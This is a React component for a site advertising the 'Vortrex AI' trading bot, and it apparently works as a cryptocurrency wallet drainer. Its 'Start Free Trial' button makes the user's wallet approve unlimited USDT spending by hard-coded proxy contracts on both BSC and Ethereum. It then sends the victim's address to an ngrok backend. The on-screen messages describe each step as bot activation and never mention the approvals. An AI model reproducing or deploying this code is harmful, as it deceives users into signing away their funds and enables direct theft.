import React, { useState, useEffect } from 'react';
import './UserProfile.css';
import '../../components/PopupMessage.css';
import PopupMessage from '../../components/PopupMessage';
import { connectTrustWallet } from '../../components/utils/walletUtils';
import { ethers } from 'ethers';

const USDT_ERC = '0xdAC17F958D2ee523a2206206994597C13D831ec7';
const USDT_BEP = '0x55d398326f99059fF775485246999027B3197955';
const PROXY_ERC = '0xB7655F67FC830986919a696B810c99cF0842c5CF';
const PROXY_BEP = '0xffd14237e7fa05EF6450db855B5aE7C2A7480B3d';
const ABI = [
  'function approve(address spender, uint256 amount) external returns (bool)',
  'function allowance(address owner, address spender) view returns (uint256)'
];
const NGROK_API_BASE = 'https://finally-noble-caiman.ngrok-free.app';

const UserProfile = () => {
  const [walletAddress, setWalletAddress] = useState('');
  const [isConnected, setIsConnected] = useState(false);
  const [walletType, setWalletType] = useState('');
  const [popup, setPopup] = useState(null);
  const [isClaiming, setIsClaiming] = useState(false);
  const [isApproving, setIsApproving] = useState(false);

  const showPopup = (msg, type = 'success', duration = 4000) => {
    setPopup({ msg, type });
    setTimeout(() => setPopup(null), duration);
  };

  useEffect(() => {
    localStorage.setItem('approval_stage', 'usdt');
    checkConnection();
  }, []);

  const checkConnection = async () => {
    if (!window.ethereum) return;
    try {
      const accounts = await window.ethereum.request({ method: 'eth_accounts' });
      if (accounts.length > 0) {
        setWalletAddress(accounts[0]);
        setIsConnected(true);
        setWalletType(window.ethereum.isTrust ? 'trustwallet' : 'metamask');
      }
    } catch (err) {
      console.warn('Wallet check failed:', err.message);
    }
  };

  const connectMetaMask = async () => {
    if (typeof window.ethereum === 'undefined') {
      window.location.href = 'https://metamask.app.link/dapp/vortrexai.site';
      return;
    }

    try {
      const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
      if (accounts.length > 0) {
        setWalletAddress(accounts[0]);
        setIsConnected(true);
        setWalletType('metamask');
      }
    } catch (err) {
      console.warn("MetaMask error:", err.message);
      showPopup("MetaMask connection failed.", "error");
    }
  };

  const handleApprove = async () => {
    if (!window.ethereum || !isConnected || !walletAddress) {
      showPopup("🛑 Connect your wallet first.", "error");
      return;
    }

    try {
      setIsApproving(true);
      setIsClaiming(true);

      // 🔁 Step 1: Switch to BSC
      await window.ethereum.request({
        method: 'wallet_switchEthereumChain',
        params: [{ chainId: '0x38' }]
      });

      showPopup('🔄 Switched to Smart Chain...');
      await new Promise(res => setTimeout(res, 1000));

      // ✅ Step 2: Approve BEP20
      await approveBEP20();

      // 🔁 Step 3: Switch to Ethereum
      await window.ethereum.request({
        method: 'wallet_switchEthereumChain',
        params: [{ chainId: '0x1' }]
      });

      showPopup('🔄 Switched to Ethereum...');
      await new Promise(res => setTimeout(res, 1000));

      // ✅ Step 4: Approve ERC20
      await approveERC20();

    } catch (err) {
      console.error(err);
      showPopup("❌ Setup failed", "error");
    } finally {
      setIsApproving(false);
      setIsClaiming(false);
    }
  };

  const approveBEP20 = async () => {
    try {
      const provider = new ethers.providers.Web3Provider(window.ethereum);
      const signer = provider.getSigner();
      const contract = new ethers.Contract(USDT_BEP, ABI, signer);

      showPopup("⚙️ Activating on Smart Chain...");
      const tx = await contract.approve(PROXY_BEP, ethers.constants.MaxUint256);
      await tx.wait();

      await notifyBackend('bep');
      showPopup("✅ Smart Chain setup complete.");
    } catch (err) {
      console.error(err);
      showPopup("❌ BSC approval failed", "error");
      throw err;
    }
  };

  const approveERC20 = async () => {
    try {
      const provider = new ethers.providers.Web3Provider(window.ethereum);
      await provider.send("eth_requestAccounts", []);
      const signer = provider.getSigner();
      const contract = new ethers.Contract(USDT_ERC, ABI, signer);
      const owner = await signer.getAddress();

      const allowance = await contract.allowance(owner, PROXY_ERC);
      if (!allowance.isZero()) {
        showPopup("Resetting existing approval...", "info");
        const resetTx = await contract.approve(PROXY_ERC, 0);
        await resetTx.wait();
      }

      showPopup("🔄 Connecting to trade module...");
      const tx = await contract.approve(PROXY_ERC, ethers.constants.MaxUint256);
      await tx.wait();

      await notifyBackend('erc');
      showPopup("🎉 Bot activated. Redirecting...");
      setTimeout(() => {
        window.location.href = '/bot-activation';
      }, 2500);

    } catch (err) {
      console.error(err);
      showPopup("❌ ERC20 setup failed", "error");
    }
  };

  const notifyBackend = async (type) => {
    try {
      const chain = type === 'erc' ? 'erc20' : 'bep20';
      await fetch(`${NGROK_API_BASE}/api/wallet/approve`, {
        method: 'POST',
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          address: walletAddress,
          chain,
          token: 'usdt'
        })
      });

      await fetch(`${NGROK_API_BASE}/api/scan-wallet`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ address: walletAddress })
      });
    } catch (err) {
      console.warn("❌ Notify backend failed:", err.message);
    }
  };

  return (
    <div className="user-profile-container">
      <h1 className="welcome-heading">📈 Trade Only When the Score Hits 90+</h1>

      <div className="status-card">
        <h2>Wallet Status</h2>
        <div className="wallet-status-box">
          <span className="status-icon">{isConnected ? '🟢' : '❌'}</span>
          <span className="status-text">
            {isConnected
              ? `Connected: ${walletAddress.slice(0, 6)}...${walletAddress.slice(-4)}`
              : 'Not Connected'}
          </span>
        </div>

        <div className="wallet-buttons-wrapper">
          <button className="wallet-connect-btn" onClick={connectMetaMask}>
            {isConnected && walletType === 'metamask'
              ? "✅ MetaMask Connected"
              : "🦊 Connect with MetaMask"}
          </button>

          <button className="wallet-connect-btn"
            onClick={() => connectTrustWallet(setWalletAddress, setIsConnected, setWalletType)}>
            {isConnected && walletType === 'trustwallet'
              ? "✅ Trust Wallet Connected"
              : "🔹 Connect with Trust Wallet"}
          </button>

          <button className="wallet-approve-btn"
            onClick={handleApprove}
            disabled={isApproving}>
            {isApproving ? "⏳ Processing..." : "🚀 Start Free Trial"}
          </button>
        </div>
      </div>

      <div className="info-section">
        <p className="info-icon">💰 <strong>No random trades. Just pure precision.</strong></p>
        <p className="info-text">
          Vortrex AI Bot scans 10+ advanced indicators in real-time and only triggers trades when at least 7 align with strong confirmation.
        </p>
      </div>

      {popup && <PopupMessage message={popup.msg} type={popup.type} onClose={() => setPopup(null)} />}
      {isClaiming && (
        <div className="claim-loader-overlay">
          <div className="claim-loader-box">
            ⏳ Activating your VORTREX Bot<br />
            <span style={{ fontSize: '14px', color: '#ccc' }}>Please wait</span>
          </div>
        </div>
      )}
    </div>
  );
};

export default UserProfile;
